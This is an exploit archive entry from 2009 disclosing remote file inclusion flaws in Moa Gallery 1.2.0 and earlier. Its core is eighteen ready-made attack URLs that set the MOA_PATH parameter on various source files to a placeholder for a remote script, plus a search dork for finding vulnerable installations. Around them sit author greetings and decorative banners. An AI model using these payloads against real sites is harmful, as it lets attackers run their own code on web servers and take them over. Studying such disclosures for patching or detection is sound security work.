Moa Gallery <= 1.2.0 Multiple Remote File Inclusion Vulnerabilities

2009-08-26T00:00:00
ID 1337DAY-ID-5695
Type zdt
Reporter cr4wl3r
Modified 2009-08-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Moa Gallery <= 1.2.0 Multiple Remote File Inclusion Vulnerabilities
===================================================================


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
######################################################################
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
**********************************************************************
######################################################################
#[x] Moa gallery <= 1.2.0 Multiple Remote File Include Vulnerability                    	  
#[!] Download             :  http://sourceforge.net/projects/moagallery/files/                      		  
#[!] Author               :  cr4wl3r                                   		              		  
#[!] Location             :  Gorontalo - INDONESIA                     		  
#[!] Dork                 :  "Tanyakan Pada Rumput Yang Bergoyang"     		  
######################################################################

[x] 3xplo!t :                                                         		  
                                                                                  
http://localhost/[path]/sources/_error_funcs.php?MOA_PATH=[AvriLhea]
http://localhost/[path]/sources/_integrity_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/_template_component_admin.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/_template_component_gallery.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/_template_parser.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_gallery_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_image_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_tag_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_tag_view.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_upgrade_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_user_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_admin.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_gallery_add.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_gallery_view.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_image_add.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_image_view_full.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_login.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_sitemap.php?MOA_PATH=[AvriLhea]          

######################################################################
#[!] Greetz : MyMom [alm]  
#                                                                        
#[!] Special Thanks : str0ke, google, All MusLiM HacKers  
#
#[!] Thanks 2 : Irvian, xoron
#
#[!] SeLamaT MenuNaiKan IbaDah PuaSa RaMadHan 1430H                                              
######################################################################
**********************************************************************
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
######################################################################
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$



#  0day.today [2018-03-05]  #